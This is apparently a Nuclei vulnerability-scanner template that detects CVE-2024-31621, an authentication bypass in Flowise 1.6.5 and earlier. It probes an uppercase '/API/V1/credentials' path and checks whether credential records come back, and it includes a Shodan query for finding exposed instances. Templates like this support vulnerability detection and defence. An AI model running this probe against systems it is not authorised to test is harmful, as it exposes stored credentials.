nuclei-templates/http/cves/2024/CVE-2024-31621.yaml

36 lines
1000 B
YAML

id: CVE-2024-31621
info:
name: Flowise 1.6.5 - Authentication Bypass
author: DhiyaneshDK
severity: high
description: |
The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
reference:
- https://www.exploit-db.com/exploits/52001
- https://github.com/FlowiseAI/Flowise/releases
- https://flowiseai.com/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-2051052918
tags: cve,cve2024,auth-bypass,flowise
requests:
- method: GET
path:
- "{{BaseURL}}/API/V1/credentials"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"credentialName":'
- '"updatedDate":'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950